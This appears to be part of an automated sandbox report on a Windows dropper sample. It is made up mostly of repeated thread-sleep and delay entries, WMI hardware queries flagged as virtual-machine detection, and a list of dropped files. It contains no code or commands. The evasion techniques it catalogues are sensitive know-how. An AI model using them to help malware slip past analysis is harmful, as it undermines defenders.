Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\Public\Libraries\srcngmlC.pif

5_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		0_2_02A2245C
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		6_2_029D245C

Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\srcngmlC.pif	Window / User API: threadDelayed 876	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Window / User API: threadDelayed 8971	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Window / User API: threadDelayed 4408	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Window / User API: threadDelayed 2698	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Window / User API: threadDelayed 1840
Source: C:\Users\Public\Libraries\srcngmlC.pif	Window / User API: threadDelayed 7964

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Dropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sys			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe			Jump to dropped file

Source: C:\Users\Public\Libraries\srcngmlC.pif

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_5-55981

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	API coverage: 7.0 %
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	API coverage: 5.2 %

Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1704	Thread sleep count: 876 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1704	Thread sleep count: 8971 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97797s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97672s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97233s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97125s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -96796s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99969s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99750s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99391s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99282s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99157s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -99032s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98922s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98594s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3652	Thread sleep count: 4408 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3652	Thread sleep count: 2698 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99887s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99778s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99667s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99436s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99326s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99214s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99102s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98990s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98862s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98622s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98510s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98398s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98286s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98159s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98032s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -97904s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -97791s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -97680s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -97568s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -97441s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -97313s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99864s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99729s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99604s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99483s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99371s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99255s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -99128s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98882s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98769s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98650s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456	Thread sleep time: -98531s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99891s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3864	Thread sleep count: 1840 > 30
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3864	Thread sleep count: 7964 > 30
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99778s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99671s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99547s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99438s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99297s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99188s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99078s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98969s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98828s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98719s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98594s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98484s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98375s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98266s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98156s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98047s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97938s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97813s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97695s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97594s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97469s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97359s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99874s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99725s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98271s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98140s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -98031s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97921s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97812s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97703s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97593s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97484s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97375s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97265s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97156s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -97046s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96937s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96827s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96718s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96609s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96500s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96390s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96281s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -96171s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99875s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99765s >= -30000s
Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176	Thread sleep time: -99656s >= -30000s

Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029D5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029D5C18

Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97797	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97672	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97233	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97125	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97015	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96796	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99969	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99860	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99750	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99391	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99282	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99157	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99032	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98922	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98594	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97985	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97735	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99887	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99778	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99667	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99436	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99326	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99214	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99102	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98990	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98862	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98622	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98510	Jump to behavior
